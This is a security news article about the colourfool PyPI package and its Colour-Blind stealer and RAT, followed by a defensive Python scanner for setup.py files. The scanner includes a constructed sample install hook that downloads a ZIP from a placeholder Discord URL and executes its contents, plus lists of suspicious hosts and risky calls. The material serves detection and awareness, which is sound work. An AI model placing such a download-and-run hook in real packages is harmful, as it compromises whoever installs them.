A fully-featured information stealer and remote access trojan (RAT) has been found embedded in a malicious Python package uploaded to the Python Package Index (PyPI). PyPI is the official repository of Python packages, and threat actors increasingly use it to host and distribute malware.
The package, named colourfool, contains the information-stealing malware, which has been dubbed Colour-Blind after the package name. Like other malicious Python modules seen on PyPI, Colour-Blind hides its malicious code in the setup script, which runs whenever the package is installed with pip. When executed, the setup script downloads a ZIP file from a hard-coded Discord URL contained within the script, unzips it, and executes the main payload. The malware starts a Flask web application on the infected system and exposes it through Cloudflare's reverse tunnel utility, "cloudflared". Because cloudflared opens an outbound connection to Cloudflare and relays requests back to the local Flask app, the threat actors can reach the web application regardless of any inbound firewall rules on the host. The web application contains modules for interacting with the infected system, including disabling security software, logging keystrokes, and stealing web browser and cryptocurrency wallet data. Persistence is established with a Visual Basic script placed in the user's Startup folder, and data is exfiltrated via transfer.sh, an anonymous file transfer site that is increasingly popular among threat actors.
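The install-time hook described above (a setup script that fetches a ZIP from a hard-coded URL, unpacks it and runs the payload) is something a practitioner can look for before running `pip install`. The following is an added example, not code from the original article or from the colourfool package: it statically triages a setup.py with Python's standard-library `ast` module, reporting URL literals on hosts named in the article (Discord and transfer.sh), calls that fetch, unpack or execute code, and a `cmdclass` override of the setuptools `install` command, which is a common way to run code at install time. The indicator lists, the `Findings` type and the sample setup scripts are constructed for this example and are not a published signature or the real package's source.

```python
"""Static triage of a setup.py for install-time download-and-execute behaviour.

Added example (not the article's or the package's code). Indicator lists below
are assumptions chosen for illustration, not a vetted signature set.
"""
import ast
import re
from dataclasses import dataclass, field
from typing import Optional

# Hosts the article names (Discord for the ZIP payload, transfer.sh for exfil)
# plus Discord's CDN domain. Assumption: suspicious when seen in a build script.
SUSPICIOUS_HOSTS = ("discord.com", "discordapp.com", "discordapp.net", "transfer.sh")

# Qualified call names that fetch, decode, unpack or execute code. Assumed list.
RISKY_CALLS = {
    "exec", "eval", "compile", "__import__",
    "os.system", "os.popen", "os.startfile",
    "subprocess.run", "subprocess.Popen", "subprocess.call", "subprocess.check_output",
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get", "requests.post",
    "zipfile.ZipFile", "base64.b64decode",
}

URL_RE = re.compile(r"https?://[^\s\"']+")


@dataclass
class Findings:
    urls: list = field(default_factory=list)
    suspicious_urls: list = field(default_factory=list)
    risky_calls: list = field(default_factory=list)   # (qualified name, line number)
    overrides_install: bool = False

    def score(self) -> int:
        """Rough triage score: suspicious hosts weigh most, then risky calls, then the hook."""
        return (len(self.suspicious_urls) * 3
                + len(self.risky_calls)
                + (2 if self.overrides_install else 0))


def _qualname(node: ast.AST) -> Optional[str]:
    """Resolve `a.b.c(...)` or `c(...)` to 'a.b.c' / 'c'; None for dynamic callees."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_source(src: str) -> Findings:
    """Walk the AST of a setup script and collect the indicators described above."""
    f = Findings()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                f.urls.append(url)
                host = url.split("/", 3)[2].lower()
                if any(host == h or host.endswith("." + h) for h in SUSPICIOUS_HOSTS):
                    f.suspicious_urls.append(url)
        elif isinstance(node, ast.Call):
            name = _qualname(node.func)
            if name in RISKY_CALLS:
                f.risky_calls.append((name, node.lineno))
            # setup(..., cmdclass={"install": SomeClass}) runs SomeClass.run() on pip install
            if name == "setup":
                for kw in node.keywords:
                    if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                        keys = [k.value for k in kw.value.keys if isinstance(k, ast.Constant)]
                        if "install" in keys:
                            f.overrides_install = True
    return f


# Constructed sample mimicking the behaviour pattern described in the article;
# this is NOT the colourfool package's setup.py.
CONSTRUCTED_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import io, os, subprocess, urllib.request, zipfile

class PostInstall(install):
    def run(self):
        install.run(self)
        data = urllib.request.urlopen("https://cdn.discordapp.com/attachments/0/0/payload.zip").read()
        zipfile.ZipFile(io.BytesIO(data)).extractall(os.getenv("TEMP", "/tmp"))
        subprocess.Popen(["python", os.path.join(os.getenv("TEMP", "/tmp"), "main.py")])

setup(name="example-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign control: a plain metadata-only setup script.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="example-pkg", version="0.1", url="https://github.com/example/example-pkg")
'''

if __name__ == "__main__":
    for label, src in (("constructed-malicious", CONSTRUCTED_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        res = scan_setup_source(src)
        print(f"{label}: score={res.score()} suspicious_urls={res.suspicious_urls} "
              f"risky_calls={sorted(res.risky_calls)} overrides_install={res.overrides_install}")
```

To apply this to a real package without executing its setup script, fetch the source distribution first (`pip download --no-deps --no-binary :all: <name>`), extract it, and run `scan_setup_source` over its setup.py; anything that scores high deserves a manual read before installation. The scanner is a triage aid only: obfuscated strings, dynamic attribute access and payloads fetched from hosts outside the assumed list will not be caught.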
This campaign coincides with another PyPI campaign in which thousands of fake packages were uploaded to the repository in an attempt to deploy a Rust-based information stealer.